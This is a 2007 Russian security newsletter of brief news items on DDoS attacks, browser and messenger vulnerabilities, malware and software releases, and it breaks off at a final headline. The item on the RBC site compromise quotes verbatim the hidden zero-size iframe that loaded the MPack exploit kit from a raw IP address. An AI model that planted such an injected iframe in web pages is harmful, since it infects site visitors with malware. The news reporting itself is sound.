uinC NewsLetter #23, 2007


Приветствуем!

Новости из Security Мира

4/06/2007 09:08 Nvidia выпустит самый производительный графический адаптер
Компания Nvidia представила на выставке Computex, проходящей в столице Тайвани Тайбее, новый мобильный графический адаптер, сообщает The Inquirer. Разработка получила название NB8E и основана на модифицированном процессоре G80 - том же процессоре, который используется в адаптерах Geforce 8800. G80 является самым мощным процессором от Nvidia на сегодняшний день. Мощность компенсируется большой теплоотдачей и энергопотреблением. Инженеры Nvidia уменьшили эти показатели, чтобы процессор можно было использовать в ноутбуках. От этого пострадала производительность, но, тем не менее, когда процессор появится летом 2007 года, это будет самый производительный мобильный графический адаптер в мире.
Подробности

5/06/2007 10:07 Хакеры атакуют Живой Журнал
Сервера "Живого Журнала" в Калифорнии подвергаются непрекращающимся распеределенным DoS-атакам с 1 июня 2007 года, сообщается в блоге компании "Суп", отвечающей за российский сегмент ЖЖ. Преположительно, источник атаки находится в России, а основными целями хакеров являются ЖЖ-сообщества организации ДПНИ, НБП и ru_рolitics. Единственной мерой пресечения атак, кроме блокировки крупных сегментов российских IP-адресов, является фильтрация входящих пакетов данных, содержащих адреса сообществ. В результате этого ограничения блокируются сообщения пользователей ЖЖ, содержащие dpni, ru_nbp и ru_рolitics, независимо от того, в какой блог они отправлены. По той же причине возникают задержки при доставке комментариев в почту и доступе к сайту livejournal.com. Также пользователи не могут оставлять комментарии длиной более 194 символов.
Подробности

5/06/2007 10:35 Новый плагин соединит Photoshop с сервисом Google
Компании Adobe и Google выпустили плагин для графического редактора Photoshop CS3 Extended. При помощи плагина, как сообщается, пользователи Photoshop CS3 Extended смогут напрямую через программу осуществлять поиск и загрузку трехмерных моделей из базы данных службы Google 3D Warehouse. Сервис Google 3D Warehouse позволяет бесплатно скачивать 3D-модели различных объектов, устройств и так далее. Желающие могут добавлять на сайт Google 3D Warehouse собственные модели. Новый плагин для Photoshop CS3 Extended может быть установлен на компьютеры, работающие под управлением операционных систем Microsoft Windows и Apple Mac OS Х. После установки дополнения в меню графического редактора появится пункт Search Google for 3D Model. Через этот пункт пользователи смогут производить поиск трехмерных моделей по ключевым словам, а также осуществлять их предварительный просмотр и последующую загрузку. Разработчики не рекомендуют скачивать модели размером более 5 Мб. В противном случае процесс их конвертирования в формат, понятный редактору Photoshop CS3 Extended, будет протекать очень медленно. Кроме того, существует ряд других проблем. В частности, плагин может некорректно работать с некоторыми моделями, отображая текстуры в искаженном виде. Помимо этого, могут возникать проблемы с загрузкой моделей, содержащих кириллические символы. Наконец, на компьютерах с Windows пользователи при повторном вызове плагина не смогут при помощи кнопки "назад" вернуться на страницу с результатами предыдущего поиска.
Плагин

5/06/2007 11:30 Вирус для калькуляторов
"Лаборатория Касперского" сообщает о вирусе для калькуляторов (сигнатура которого включена в антивирус компании). Резидентный вирус Virus.TI.Tigraa.a имеет размер всего 492 байта, в лучших традициях DOS-вирусов. Работает на инженерных калькуляторах Texas Instruments серии TI-89 (TI-89, TI-89 Titanium) и модели Voyage 200, на которой запускается большинство программ, написанных для TI-89. В этих калькуляторах используется процессор Motorola 68000. Вирус может очищать экран и затем выводить надпись "t89. GAARA". Вирус является так называемым proof-of-concept. Работает только в контексте одного калькулятора и не может заразить другие, но само по себе существование этого вируса в очередной раз говорит о том, что список типов заражаемых устройств пополняется.
Источник

5/06/2007 11:51 Уязвимости в IE и Firefox
Известный в мире компьютерной безопасности исследователь Майкл Залевски сообщает о наличии уязвимостей в браузерах Internet Explorer и Firefox, в которых обнаружено по 2 уязвимости типа 0day, в том числе — критическая в IE 6 и 7 и «значительная» в Firefox 2.0. Майкл Залевски (Michael Zalewski) и опубликовал детали уязвимостей в списке рассылки Bugtraq. Самая серьёзная из четырёх, критическая уязвимость в Internet Explorer 6 и 7, названная Залевски «заманить и подменить», позволяет получить управление компьютером жертвы при помощи вредоносного кода на JavaScript. «Вся модель безопасности браузера рушится как карточный домик и делает вас уязвимыми к набору назойливых атак», — написал исследователь в пояснении к концептуальному эксплойту. Приведены ссылки на страницы с демонстрацией уязвимостей.
Подробности

5/06/2007 13:01 Рекламные ссылки опаснее, чем обычные
Как выяснили специалисты компании McAfee, щелчок по оплаченной ссылке в результатах, выводимых Google, Yahoo и другими поисковыми системами, несет в себе в 2,5 раза больший риск, чем переход по обычной ссылке. Тем не менее, как утверждают в McAfee, доля опасных рекламных ссылок за последние полгода существенно снизилась, во многом благодаря изменениям в системе Google AdWords. По данным сервиса McAfee SiteAdvisor, в мае прошлого года 8,9% всех оплаченных ссылок являлись потенциально опасными, тогда как шесть месяцев тому назад показатель снизился до 8%, а сейчас составляет 6,9%. Доля рискованных ссылок при поиске по терминам, относящимся к сайтам для взрослых, выросла по сравнению с прошлым годом с 8 до 9,4%. Щелчок по рекламной ссылке при таком поиске еще опаснее - 23% выводят на ненадежные сайты. К числу самых опасных на сегодня ключевых слов при поиске в McAfee относит термины bearshare, screensavers, limeware, kazaa, wallpapers и ringtones.
Источник

5/06/2007 13:53 Первые школы переходят на Linux
В питерских школах стартует эксперимент: десяток образовательных учреждений к 1 сентября этого года будут оснащены компьютерами с ОС Linux. Однако до сих пор не ясно, кто будет финансировать эту программу. Комитет по образованию Петербурга, проводивший специальные обучающие семинары для учителей, получил интересную информацию. По словам ведущего специалиста комитета Игоря Базлова, ряд петербургский школ проявили интерес к переходу на альтернативное свободное ПО. В основном речь шла о Linux. Г-н Базлов сообщил, что комитет пошел на встречу образовательным учреждениям. Осенью на базе этих школ будет создана экспериментальная площадка, где будет внедряться Linux. «Если опыт даст положительные результаты, комитет будет рекомендовать Linux для внедрения во всех школах», — заявил Игорь Базлов. Директор школы N 369 Петербурга Константин Тхостов полагает, что в связи с переходом на Linux могут возникнуть проблемы во взаимоотношениях образовательных учреждений с комитетами администрации города. «Юридическое лицо, такое как школа, работает в системе Горзаказа, с различными комитетами администрации. При установке Linux эта работа будет затруднена», — считает г-н Тхостов. И, тем не менее, он уверен, что переход на Linux был бы лучшим подарком школьникам к 1 сентября. Генеральный директор «Линукс ИНК» Леонид Сомс заявил, что процесс внедрения в школах свободного ПО сопряжен с рядом проблем. «Прежде всего, это инертность преподавательского сообщества, выраженная в затрудненном переходе от привычных образовательных программ к новым», — отметил он. По его мнению, еще одной проблемой является низкая совместимость Linux и Windows. Тем временем участников эксперимента по установке свободного ПО интересует, за чей счет в школах будут устанавливать легальные ОС. Есть надежда на федеральное финансирование, у городского комитета по образованию эти суммы в бюджет не заложены.
CNews

5/06/2007 15:07 ФБР приняло на вооружение новую технологию мониторинга Интернета
По иронии судьбы, ФБР, защищая американских граждан от всяческих напастей, само оказалось беззащитным перед лицом преступников. Это парадоксальное заявление было сделано отделом сетевых разработок правительства Соединенных Штатов. По словам представителя отдела, несанкционированный доступ во внутренние сети ФБР может получить практически любой желающий. На компьютерах, установленных в святая святых национальной безопасности, нет даже паролей. Что уж говорить о более сложных элементах защиты, как, например, сканирование отпечатка пальца для доступа ко внутренней информации. Для того, чтобы выведать государственные секреты, не нужно быть хакером. Потенциальному "информационному вору" для добычи интересующих его сведений, нужно всего ничего - устроиться на работу в ФБР, где ему будет выделен персональный компьютер. Дальнейшее - лишь дело техники. Помимо этого, в сети ФБР, по словам экспертов, недостаточно хорошо работает поисковая система. А данные и вовсе сохранены без применения шифров. В своем официальном заявлении глава ФБР подтвердил эту информацию, но заметил, что данные доклада не стали для него неожиданностью. Федералы уже давно работают над решением этой проблемы, но, видимо, пока безрезультатно. Несмотря на очевидные упущения в части защиты данных, ФБР весьма успешно работает со сторонней информацией. Так, недавно Бюро приняло на вооружение новую технологию мониторинга Интернета вместо устаревшей системы Carnivore. Возможности "новорожденного" значительно шире - они позволяют отслеживать сетевую активность подозреваемых в совершении преступлений, одновременно вести базу данных о вполне законопослушных гражданах, а также фиксировать интернет-трафик, включая IP-адреса, просмотры отдельных страниц и электронную почту. Новая система получила название "пылесосного метода" и активно используется сотрудниками ФБР. Схема его действия не отличается принципиальной новизной - для начала в определенном сегменте сети происходит сбор информации, а затем данные пользователя, являющегося объектом расследования, подвергаются сканированию при помощи специальных фильтров.
Источник

6/06/2007 09:58 Мосгорсуд отменил решение об аннулировании доменов livesport.ru и livestream.ru
5 июня Московский городской суд отменил решение об аннулировании доменов livesport.ru и livestream.ru. Решение признать домены орудием преступления принял в конце марта Солнцевский районный суд по иску Издательского дома "Секрет фирмы", владеющего интернет-изданием "Газета.Ру". "Секрет фирмы" обвинял владельца сайтов livesport.ru и livestream.ru Артура Виноградова в нарушении авторских прав, выразившимся в перепечатке большого количества материалов из Газеты.Ру без разрешения правообладателя. При этом истец настаивал, что доменные имена являются орудием правонарушения и должны быть аннулированы. Ответчик в свою очередь утверждал, что при перепечатке было соблюдено единственное на тот момент требование "Газеты.Ру" - постановка ссылки на первоисточник. Солнцевский суд решил дело в пользу "Секрета фирмы" и постановил взыскать с Виноградова 10 тысяч рублей, а регистрацию доменов аннулировать. Ответчик подал кассационную жалобу в Мосгорсуд. В ходе нового разбирательства ответчику удалось убедить Мосгорсуд, что сам по себе домен не может являться "орудием", а представляет собой просто адрес сайта. В итоге Мосгорсуд отменил самый жесткий пункт решения Солнцевского суда, сохранив размер компенсации в 10 тысяч рублей. Отмены этого пункта Виноградов намерен добиваться уже в Верховном суде.
Подробности

6/06/2007 10:22 Материалы по DDoS-атакам на Livejournal направлены в ФБР
Антон Носик, руководитель службы блогов компании "СУП", объявил в своём онлайновом дневнике, что компания Six Apart, владелец сервиса Livejournal.com сняла фильтры на определённые слова в http-запросах. Напомним, что ещё 4 июня этого года пользователи ресурса не могли отправлять в свои блоги записи, содержащие буквосочетания "dpni", "ru_nazbol", "ru_politics" и "ru_nbp". Такие ограничения были введены в результате постоянных DDOS-атак на сервера "Живого журнала". По словам Эйба Хассана, администратора Livejournal, все пользователи, журналы или сообщества которых были удалены администрацией в ходе борьбы с последствиями DDOS-атак, а потом восстановлены, получат письма с объяснениями от Six Apart. Антон Носик, также, говорит в своём блоге, что ему удалось узнать от Барака Берковитца, генерального директора Six Apart, о том, что материалы по атакам на серверы компании были переданы в ФБР.
Подробности в блоге Носика

6/06/2007 11:07 Вышла предварительная версия OpenOffice для Mac OS X
Участники проекта OpenOffice.org Mac Porting выпустили предварительную версию офисного пакета OpenOffice для операционной системы Mac OS X. Портирование OpenOffice.org на Mac OS началось фактически сразу после выхода самой первой версии офисного пакета. Однако до настоящего времени в процессе работы на "Маках" OpenOffice использовал систему X11. Представленная же 5 июня модификация OpenOffice для Mac OS X поддерживает графический интерфейс Aqua операционной системы и не требует применения Х11. Однако разработчики отмечают, что новая версия OpenOffice для Mac OS X содержит большое количество недоработок и не подходит для повседневного использования. В частности, OpenOffice пока не позволяет распечатывать документы, отсутствует поддержка нескольких мониторов, а выход из программы сопровождается аварийным завершением работы приложения. Кроме того, доработки требуют функции копирования, вставки, преобразования файлов формата PDF и пр. На сайте проекта OpenOffice.org Mac Porting отмечается, что установка предварительной версии офисного пакета может приводить к утере данных на жестком диске. Поэтому перед инсталляцией рекомендуется создать резервные копии файлов.
Страница загрузки

7/06/2007 09:36 Microsoft рассказала хакерам про ошибки в приложениях Windows
Компания Microsoft опубликовала на сайте своей службы поддержки инструкцию по созданию программы, позволяющей обойти защиту веб-сервера Internet Information Services (IIS), сообщает The Inquirer. Злоумышленник может воспользоваться ошибкой в библиотеке Webhits.dll, входящей в IIS, для доступа к закрытым документам в обход идентификации. Ошибка относится только к IIS версий 5.х. На данный момент исходный код программы, использующей ошибку, уже удален с сайта Microsoft. Тем не менее, пока не существует обновления для IIS, исправляющего эту ошибку. Для защиты от хакеров Microsoft рекомендует обновить IIS до версии 6.0. Этот программный комплекс поставляется только в комплекте с серверной операционной системой Windows Server 2003, самая дешевая версия которой стоит около 800 долларов.
Подробности

7/06/2007 10:21 SpaceTime3D выпустила первый полностью трехмерный веб-браузер
Компания SpaceTime3D выпустила первый полностью трехмерный бесплатный веб-браузер, сообщает Gizmodo. Разработка пока находится в стадии бета-тестирования. Браузер SpaceTime отображает веб-страницу как трехмерный объект. Пользователь может повернуть страницу под любым углом и масштабировать ее до нужного размера. Браузер поддерживает вкладки, которые отображаются как набор трехмерных объектов, переключение между которыми осуществляется мышью. Для полноценного просмотра страницы необходимо два раза кликнуть на объекте - страница откроется в стандартном двухмерном виде. Разработчики заявляют, что их браузер поддерживает все мультимедийные функции, но пока часть этих функций не работает. Также SpaceTime предлагает уникальные функции для поиска в Google, Yahoo!, по аукциону eBay и фото-порталу Flickr. При осуществлении поиска по этим сайтам, каждый найденный объект автоматически отображается в новом трехмерном окне для удобства просмотра результатов. SpaceTime работает под управлением Windows 2000/XP/Vista и требует больше ресурсов, чем любая аналогичная разработка. Например, браузеру нужна видеокарта с объемом графической памяти не меньше 128 мегабайт, поддерживающая DirectX и OpenGL, 512 мегабайт оперативной памяти, разрешение экрана не ниже 1280 х 1024 и мощный процессор.
Подробнее

7/06/2007 10:54 IBM: пользователи недооценивают количество дыр в ПО
Эксперт по вопросам компьютерной безопасности IBM Гантер Оллманн утверждает, что пользователи недооценивают количество уязвимостей, которые ежегодно выявляются в программных продуктах. Оллманн со ссылкой на отчет Internet Security Systems отмечает, что в минувшем году публично была обнародована информация примерно о 7250 новых дырах в программных пакетах. Однако на самом деле, по словам Оллманна, в 2006 году в ПО были выявлены почти 140 тысяч новых дыр. Таким образом, до пользователей дошли сведения лишь о 5,48% обнаруженных уязвимостей. Специалист IBM выделяет несколько основных причин, по которым число найденных дыр столь сильно отличается от числа уязвимостей, информация о которых была обнародована публично. Зачастую, отмечает Оллманн, поставщик программного продукта, обнаруживший брешь самостоятельно, устраняет ее без громкой огласки. Кроме того, нередко специалисты считают, что найденные дыры не представляют особой опасности, а поэтому поднимать из-за них шум не стоит. Наконец, большую часть ежегодно выявляемых дыр обнаруживают тестеры, работающие по контрактам с поставщиками программных продуктов. Как правило, информация о таких уязвимостях остается закрытой. По оценкам Оллманна, в прошлом году до рядовых пользователей не дошла информация примерно о 132 тысячах дыр. Оллманн также подчеркивает, что число потенциально слабых мест в одном приложении зависит от сложности и размера программы. Так, приводит пример Оллманн, команда из четырех человек за пять дней работы выявила в одном из коммерческих продуктов сразу 600 дыр. Таким образом, администраторы сетей, чья стратегия защиты базируется на установке патчей лишь для публично обнародованных уязвимостей, фактически оставляют свои системы открытыми для атак.
Подробности

7/06/2007 11:48 Новый язык программирования Nesla, похожий на JavaScript и PHP
Вышла новая версия языка программирования Nesla 0.6.0, сообщает opennet.ru. NullLogic Embedded Scripting Language (Nesla) - скриптовый язык программирования, интерпретатор которого распространяется под лицензией GNU GPL. Проект Nesla вырос из парсера конфигурационных файлов, по синтаксису язык похож на JavaScript и PHP. Размер архива с исходными текстами - 94 Кб.
О языке на русском

7/06/2007 13:03 Mozilla представила альфа-версию Firefox 3
Компания Mozilla представила альфа-версию нового браузера Firefox 3. Демонстрационная версия программы-обозревателя доступна для скачивания на официальном сайте Mozilla, размер дистрибутива составляет 6,2 мегабайта. Альфа-версия новой версии Firefox, известная как Gran Paradiso Alpha 5, позиционируется как программный продукт, рассчитанный исключительно на IT-специалистов и бета-тестеров. Рядовых пользователей Firefox разработчики призывают не скачивать GP Alpha 5 и подождать релиза окончательной версии браузера. Firefox 3 будет создан на базе нового движка Gecko 1,9. В связи с этим новая версия браузера будет неспособна работать на персональных компьютерах под управлением операционных систем Windows 95, 98 и ME, а также на Macintosh с установленными OS X 10.2 и более ранних версий. Выпуск окончательного варианта Firefox 3 намечен на осень 2007 года.
Страница для скачивания

7/06/2007 14:05 Новое ПО Intelore: взлом паролей для MS Office
Российская компания Intelore представила новую версию утилиты восстановления (взлома) паролей к документам Microsoft Office, «Office Password Recovery v2.0», сообщил Net-security.org. Вторая версия позволяет находить пароли к защищённым файлам MS Office 97 или 2000 без отправки всего документа на удалённый сервер восстановления: вместо этого отправляется лишь часть файла, не содержащая самого текста документа. Документы Office 97, 2000, 2002, 2003 и XP также можно расшифровывать и на локальном компьютере с сохранением их в формате, совместимом с Office 97/2000. В утилиту также добавлено восстановление паролей на изменение и доступ; OPR 2.0 работает со всеми видами документов Office: Access, Word, Excel, PowerPoint и Outlook. Бесплатная версия доступна на сайте компании Intelore.com; лицензия на некоммерческое применение стоит $79, для бизнес-пользователей - $129. По более низкой цене продаются отдельные компоненты – Word Password Recovery и Excel Password Recovery.
Cайт разработчиков

7/06/2007 14:34 Эстония попросила Россию помочь в поимке хакеров
Эстония нуждается в помощи России в поиске инициаторов масштабных DDoS-атак на интернет-инфраструктуру страны, заявил в среду премьер-министр Андрус Ансип (Andrus Ansip). Атаки против эстонских правительственных сайтов начались после переноса властями статуи Бронзового солдата из центра Таллина на окраины, сообщил Reuters. Таким образом, частные лица, предположительно из России, выражали свой протест против решения властей Эстонии. Некоторые российские хакеры даже не скрывали своих действий. В результате многие правительственные сайты Эстонии перестали работать, а местная компьютерная группа быстрого реагирования была вынуждена закрыть доступ к сайтам из-за границы. Пик атак пришёлся на 8 и 9 мая. «Это явно преступная деятельность, и я надеюсь, что Россия будет сотрудничать с Эстонией в этих делах», — сказал Ансип на пресс-конференции в Хельсинки. Атаки представляли собой лавину запросов, иногда до 5 млн в секунду против обычной посещаемости 1–1,5 тыс. в день, сказал премьер-министр.
Источник

7/06/2007 15:26 Уязвимости будут патентовать?
Компания Intellectual Weapons предлагает исследователям уязвимостей патентовать свои открытия и получать с них прибыль, лицензируя информацию разработчикам уязвимых приложений, их конкурентам и производителям продуктов ИТ-безопасности. В настоящее время специалисты IW разрабатывают соответствующий сервис. Компания сообщила об изобретении процесса быстрого патентования и лицензирования найденных уязвимостей, но пока не доработала его до полной готовности. По данным The Register, речь идёт об уязвимостях, найденных законным путём. Некоторые компании уже скупают уязвимости для предложения быстрых патчей своим клиентам. Этим занимается iDefense в рамках Vulnerability Contributor Program и 3Com, открывшая «Инициативу нулевого дня». За каждую найденную уязвимость исследователь может получить до $10 тыс. Если иметь правильный контракт и работать с правительственными агентствами, то можно получить до $50 тыс. Уязвимости также продаются нелегально на чёрном рынке.
Источник

8/06/2007 09:34 Lavasoft и Symantec представили новые бесплатные защитные программы
Известные разработчики антивирусного (и антишпионского) ПО, компании Lavasoft и Symantec, представили свои новейшие разработки в сфере безопасности. Шведская Lavasoft выпустила антивирус Ad-Aware 2007, а их американские коллеги из Symantec разместили для свободного скачивания публичную бета-версию программы Norton AntiBot. Ad-Aware 2007, как и предыдущая версия программы, распространяется в трех вариантах: бесплатном Free и платных Plus и Pro. Существенные изменения претерпел интерфейс программы, также увеличилось количество настроек сканирования системы. Как и раньше, ряд возможностей Ad-Aware доступен только платным пользователям (это мониторинг системы в реальном времени и ряд других функций). Бесплатную версию программы, которая позволит обнаружить и уничтожить до 82 тысяч вредоносных программ, можно скачать по этой ссылке, размер дистрибутива составляет 17 мегабайт. Бета-версия Norton AntiBot, программы, следящей за поведением потенциально опасного программного обеспечения. Разработчики подчеркивают, что Antibot является лишь дополнением, но ни в коем случае не заменой антивирусным программам. Скачать Antibot можно с официального сайта Symantec.
Ccылка для скачивания AdAware
Ссылка для скачивания Antibot

8/06/2007 09:52 Microsoft выпустит в июне 6 патчей для Windows Vista и Office
Корпорация Microsoft на следующей неделе планирует опубликовать шесть бюллетеней безопасности с информацией о новых дырах в операционных системах Windows, офисных приложениях и браузере Internet Explorer. Как сообщается в предварительном уведомлении, четыре из шести бюллетеней будут содержать сведения о критически опасных уязвимостях. Эти дыры теоретически могут использоваться с целью получения доступа к удаленному компьютеру и последующего выполнения на нем произвольного вредоносного кода. Уязвимости, получившие максимальный рейтинг опасности, выявлены, в частности, в программе Outlook Express, браузере Internet Explorer и почтовом клиенте Windows Mail, входящем в состав операционных систем Windows Vista (в том числе 64-битных версий). Еще одна дыра получила рейтинг важной. Она присутствует в программе для работы с диаграммами Microsoft Visio 2002/2003 и может применяться с целью выполнения на компьютере жертвы произвольных операций. Кроме того, Microsoft планирует выпустить заплатки для умеренно опасных дыр в операционных системах Windows Vista, которые позволяют получить несанкционированный доступ к пользовательской информации. Кроме того, 12 июня Microsoft планирует выпустить ряд апдейтов, не связанных с безопасностью, а также обновленную версию инструментария Windows Malicious Software Removal Tool, предназначенного для удаления вредоносных программ.
Пререлиз

8/06/2007 10:49 Француз хочет отсудить у Microsoft торговую марку Vista
Француз Филиппе Гилдас подал в суд на Microsoft, обвинив корпорацию в нарушении его интеллектуальной собственности, сообщает Infoworld. Гилдас утверждает, что права на название Vista, под которым вышла новая операционная система Windows, принадлежат ему. По словам истца, он зарегистрировал торговую марку еще в октябре 2003 года, то есть за два года до Microsoft. Согласно поданному иску, Гилдас "забронировал" звучное название для телеканала Tele Vista, который планировали открыть в 2003 году. Впоследствии этот проект был отложен и теперь должен стартовать в нынешнем году. Однако, как говорит Гилдас, появление Windows Vista не лучшим образом повлияет на открытие нового телеканала. В том, что он сумеет выиграть дело, Гилдас не сомневается, так как зарегистрировал торговую марку в сфере средств массовой информации и развлечений, которая, как он считает, пересекается с использованием интернета и программных продуктов. Однако юристы наоборот придерживаются мнения, что выиграть иск французу будет затруднительно, поскольку в данном случае сходные торговые марки зарегистрированы в совершенно разных сферах.
Подробнее

8/06/2007 11:12 Уязвимость в Yahoo Messenger
В интернет-пейджере Yahoo Messenger обнаружена критическая уязвимость. Модуль ActiveX, обеспечивающий видеосвязь через веб-камеры, содержит ошибку типа «переполнение буфера», позволяющую выполнить произвольный код при удалённой атаке. Суть ошибки – в неправильной обработке длинных имён серверов в функции send() и receive() – отправки и получения - библиотек ywcupl.dll и ywcvwr.dll. Эксплоиты уже циркулируют по Сети в открытом доступе, сообщает Heise-security.co.uk. Уязвим Yahoo Messenger версии 8.1.0.249 и, возможно, программы более ранних версий. Для защиты от уязвимости необходимо отключить уязвимые компоненты - установить вручную флаг совместимости («killbit») для классов с CLSID {DCE2F8B1-A520-11D4-8FD0-00D0B7730277} и {9D39223E-AE8E-11D4-8FD3-00D0B7730277} в реестре.
CNews

8/06/2007 11:45 Сайты на базе Microsoft IIS - опаснее
Согласно результатам исследования, проведенного специалистами Google, на сайтах, работающих под управлением Web-сервера Microsoft, вредоносный код попадается вдвое чаще, чем на остальных. На протяжении мая команда Google Anti-Malware обследовала около 70 тыс. доменов, либо распространяющих вредоносное ПО, либо осуществляющих хостинг атакующего кода. Всего под управлением Microsoft Internet Information Services (IIS) и Apache работает порядка 89% всех сайтов, и вместе они отвечают за хранение около 98% всего вредоносного ПО в Web. Сотрудниками Google было обнаружено поровну "вредных" сайтов на базе Apache и IIS, но поскольку общая доля Apache составляет 66%, а IIS 23%, следовательно, и процент вредоносных сайтов на базе IIS значительно выше. В Китае и Южной Корее большинство таких сайтов работает на основе IIS. В США, России и Германии, однако, Apache в качестве "рассадника инфекции" более популярен.
Источник

8/06/2007 12:19 Oracle 11g выйдет 11 июля
Компания Oracle выпустит новую версию своей СУБД 11 июля - корпорация разослала приглашения на презентацию продукта, которая пройдет в Нью-Йорке. В октябре прошлого года на конференции OpenWorld представители Oracle сообщили, что в Oracle 11g будет улучшена готовность, производительность, масштабируемость, управляемость и диагностируемость. Кроме того, для СУБД была обещана технология компрессии, которая позволит на 60% уменьшить потребности в пространстве хранения для баз, и механизм хранения неструктурированных данных, являющийся более быстрым, чем традиционные файловые системы. В настоящее время Oracle 11g проходит бета-тестирование.
"Открытые системы"

8/06/2007 12:46 Сайт РБК распространял троян
Вчера утром в коде главной страницы РБК появился код, с помощью которого злоумышленники устанавливали на компьютер жертвы программу MPack, а она благодаря многочисленным уязвимостям браузера загружала разнообразное вредоносное программное обеспечение. Опасная "дописка" в коде известного портала выглядела как iframe размером 0х0: < iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0></iframe>. Как сообщает сайт SecurityLab, за небольшой промежуток времени трояном было заражено несколько десятков тысяч пользователей. РБК взламывается не впервые - в сентябре прошлого года была инфицирована страница top.rbc.ru. Тогда на компьютер жертвы загружался Trojan-PSW.Win32.LdPinch-ayj, который затем отправлял все найденные пароли злоумышленникам. Заражение сайтов в настоящее время является одним из самых эффективных способов доступа к клиентским компьютерам. У большинства пользователей нет антивирусов для браузеров или же их отключают для экономии ресурсов. Кроме того, привычный сайт не таит на первый взгляд никакой опасности. Но он может быть не менее опасен, чем порносайт - ряд вирусов использует сохраненные в FTP-менеджерах пароли и самостоятельно обновляет на веб-сервере все index-файлы, добавляя в них незаметный iframe.
SecurityLab

8/06/2007 13:39 Пенсионера засудили за пиратский Photoshop
Вчера Чкаловский районный суд Екатеринбурга вынес обвинительный приговор 77-летнему пенсионеру за использование контрафактного компьютерного обеспечения, - сообщает "Новый Регион". За нарушение авторских прав он получил полгода лишения свободы условно и обязан выплатить штраф в 2,5 тысячи рублей. Как сообщает агентство, в период до 12 июля 2005 года подсудимый – и.о. главного инженера ООО «УЦМ» – купил у неустановленного следствием лица графические редакторы Аdobe Photoshop, AutoDesk и AutoCAD, которые позже установил на нескольких рабочих компьютерах. В ходе проверки предприятия сотрудники отдела «К» ГУВД Свердловской области выяснили, что программы являются контрафактными. Свою вину подсудимый признал полностью. При назначении наказания суд принял во внимание возраст подсудимого, его раскаяние, наличие у него правительственных наград, а также то, что преступление было совершено им впервые. Осужденный должен ежемесячно являться для отметки в уголовно-исполнительную инспекцию и не менять место жительства без уведомления инспектора. Приговор вступит в силу через 10 дней, если не будет обжалован сторонами.
Подробности

8/06/2007 15:56 Обнаружен червь, заражающий документы OpenOffice.org
Специалисты Symantec обнаружили в интернете червя, заражающего документы офисного пакета с открытым кодом OpenOffice.org. Вредоносный код распространяется во всех версиях OpenOffice.org вне зависимости от платформы (Windows, Linux или Mac OS). Центр экстренного реагирования компании предостерегает пользователей от открытия документов OpenOffice.org, присланных из неизвестных источников. Впервые исследователи узнали о существовании червя в конце мая, вероятно, получив его исходный код. До сих пор он считался концептуальным, однако недавно был перехвачен в вирусных почтовых рассылках. Symantec присвоила ему «средний» уровень опасности.
CNews

9/06/2007 09:15 В независимом тесте антивирусов победили малоизвестные продукты
Специалист по компьютерной безопасности Андреас Клементи, являющийся создателем сайта AV Comparatives, провел очередное сравнительное тестирование антивирусных программ. Как сообщает ArsTechnica, на этот раз Клементи оценивал эффективность работы антивирусов при выполнении задачи идентификации еще не известных вредоносных программ. Для тестирования были отобраны семнадцать продуктов, в том числе антивирусные решения от Microsoft, Symantec, McAfee, AVG и "Лаборатории Касперского". Во время эксперимента Клементи использовал антивирусы с базами данных от 2 февраля без установленных обновлений. Для проверки возможностей отобранных продуктов применялась подборка вирусов, вредоносных скриптов, троянов и шпионских модулей, обнаруженных в период со 2 февраля по 2 мая. Наилучший результат, по итогам исследования, продемонстрировал малораспространенный антивирус Avira, сумевший отловить 71% неизвестных вредоносных программ. Второе место с показателем в 68% занял продукт NOD32 от компании Eset. Более известные антивирусы от Symantec и McAfee смогли "поймать" только 24% отобранных для исследования вредоносных модулей. Продукт Microsoft OneCare смог правильно идентифицировать 18% неизвестного программного кода. Не слишком хороший результат показали антивирусы "Лаборатории Касперского" и eScan, которые задержали лишь 9% вредоносных программ. Последнее место с показателем в 8% занял пакет AVG. Примечательно, что в ходе исследования, проведенного сайтом AV Comparatives в марте нынешнего года, последнее место заняла широко разрекламированная комплексная система обеспечения безопасности Microsoft Live OneCare. Правда, тогда перед проведением эксперимента Клементи провел обновление антивирусов и установил оптимальные настройки работы пакетов. В итоге на первом месте по числу обнаруженных вирусов с показателем в 99,45% оказался антивирусный пакет Anti-Virus Kit от компании G Data Security Software. Что касается Microsoft Live OneCare, то этот продукт смог идентифицировать только 82,40% вредоносного кода.
Результаты тестирования

9/06/2007 09:54 Хакеры «сломали» DreamHost: скомпрометированы 3,5 тыс. доменов
Неизвестные хакеры разместили троянский код на страницах американского сайта музыкальных наград Mecrury и ещё сотни менее известных ресурсов, взломав серверы веб-хостинга DreamHost, сообщил The Register. Специалисты DreamHost выяснили, что уязвимость скрывалась в ПО панели управления хостингом; пострадавшие уведомлены по электронной почте. Попытка хакеров получить доступ к клиентской базе не увенчалась успехом, и информация о реквизитах не подверглась раскрытию, заявило руководство хостинга. DreamHost обслуживает более 500 тыс. доменов. Из них были скомпрометированы 3,5 тыс. Атака произошла после того, как компания обновила ПО WebFTP.
Источник

9/06/2007 10:42 Уязвимость в ПО Symantec
Symantec обновила пакет Ghost Solution Suite после того, как в нём были обнаружены 3 уязвимости «отказа в обслуживании». В частности, и серверные, и клиентские части приложения можно было вывести из строя отправкой единственного специально сформированного пакета через локальную сеть, сообщил Heise-security.co.uk. По данным iDefense, отправка UDP-пакета на порты, отслеживаемые программой (1346 и 1347), вызывала нарушение доступа к памяти в одной из сетевых библиотек. Для эксплуатации уязвимости не требовалось наличие учётной записи. Ввиду особенностей протокола, по которому работает соединение клиент-сервер (UDP), атакующий может скрыть истинный источник атаки, подменив адрес источника запроса. Уязвимость подтверждена в версии Symantec Ghost 8.0.992, возможно наличие уязвимости в других версиях ПО. Выпущено обновление.
Подробности об уязвимости

9/06/2007 22:04 Депутаты установили максимальный срок гарантийного ремонта
Депутаты Государственной Думы одобрили ряд поправок к закону о защите прав потребителей. В частности, в новой редакции закона введен предельный срок гарантийного ремонта. В старой редакции закона срок определялся соглашением сторон и мог быть любым, пояснили изданию в Конфедерации обществ потребителей. Теперь депутаты Госдумы нашли способ противодействовать непрогнозируемым задержкам ремонта: новая редакция закона не позволит сервис-центрам затягивать ремонт, ссылаясь на отсутствие деталей или сложность работ.
Источник

10/06/2007 10:07 Издатель решил проучить Google, украв ноутбуки компании
